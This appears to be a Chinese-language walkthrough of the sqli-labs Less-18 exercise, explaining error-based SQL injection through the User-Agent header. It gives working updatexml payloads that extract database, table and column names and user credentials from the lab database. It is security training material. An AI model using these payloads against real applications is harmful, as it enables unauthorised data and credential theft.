sqli-labs:Less-18关卡详细解析

发布于:2025-08-03 ⋅ 阅读:(15) ⋅ 点赞:(0)

1. 思路🚀

本关的SQL语句为:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
  • 注入类型:字符串型(单引号包裹)、INSERT操作
  • 提示:参数需以'闭合
  • 关键参数:uagent

php输出语句的部分代码:

if($row1)
{
	echo '<font color= "#FFFF00" font size = 3 >';
	$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
	mysql_query($insert);
	//echo 'Your IP ADDRESS is: ' .$IP;
	echo "</font>";
	//echo "<br>";
	echo '<font color= "#0000ff" font size = 3 >';			
	echo 'Your User Agent is: ' .$uagent;
	echo "</font>";
	echo "<br>";
	print_r(mysql_error());			
	echo "<br><br>";
	echo '<img src="../images/flag.jpg"  />';
	echo "<br>";
}

本关卡的回显语句是echo 'Your User Agent is: ' .$uagent;,而且必须通过正确的账号密码后才会回显User-Agent信息,这是由源码决定的,需要已知的账号和密码,暂且每次提交的账号密码都是admin,根据提示,insert配合报错盲注

在这里插入图片描述


2. 手工注入步骤🎯

本次解析需要抓包,就使用Burpsuite的Repeater功能展示一下,工具自备,相信会很快上手。
接下来的操作,只需要将下面的User-Agent放入对应位置,粘贴即可。

2.1. 判断回显位⚡

正常提交账号:admin,密码:admin,抓取一下数据包,选中Repeater功能就行。
在这里插入图片描述
在这里插入图片描述


2.2. 获取基本信息⚡

接下来配合updatexml函数实现报错盲注

1' and updatexml(1,concat(1,(select database())),3) and'

在这里插入图片描述
在这里插入图片描述

为什么 User-Agent: 1' and updatexml(1,concat(1,(select database())),3) and' 可以成功?
这段代码的 SQL 注入点在于 $uagent 被直接拼接到 SQL 语句中:

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

如果 $uagent 被替换为:

1' and updatexml(1,concat(1,(select database())),3) and'

那么最终的 SQL 语句会变成:

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1' and updatexml(1,concat(1,(select database())),3) and'', '$IP', $uname)

解析:

  • '1' 先闭合了前面的单引号。
  • and updatexml(1,concat(1,(select database())),3) 执行错误注入,返回数据库名。
  • and '' 确保后面的单引号被闭合,避免语法错误。
  • 整体 SQL 语法正确,成功执行并返回数据库名。

2.3. 获取表名⚡

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),3) and'

在这里插入图片描述
在这里插入图片描述


2.4. 获取字段⚡

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users')),3) and'

在这里插入图片描述
在这里插入图片描述


2.5. 获取数据⚡

下面是获取一个用户的sql语句,修改limit偏移量可获取其余用户的账号密码信息。

1' and updatexml(1,concat(1,(select concat(username, ':', password) from users limit 0,1)),3) and'

在这里插入图片描述
在这里插入图片描述


2.6. 参数汇总表⭐

参数 作用 示例
' 闭合符号 id=1'
updatexml() 报错注入函数 updatexml(1,(select database()),3)
concat() 字符串拼接函数 concat('a','b')concat(1,(select database()))
information_schema 系统数据库 from information_schema.tables
table_schema 数据库名称 table_schema='security'
table_name 数据表名称 table_name='users'
column_name 字段名称 group_concat(column_name)

3. 总结🏁

关于用sqlmap工具直接爆破不好使,而且对于本关卡来说用处不大。通过本关卡,尝试在http请求头上做文章,从而达到sql注入的效果,这在后面也是会经常遇到的,同时配合报错盲注获取数据。

有关报错盲注的解析,关卡5最为详细,欢迎移步"sqli-labs:Less-5关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149778521?spm=1011.2124.3001.6209


声明:本文仅用于安全学习,严禁非法测试! ❗❗❗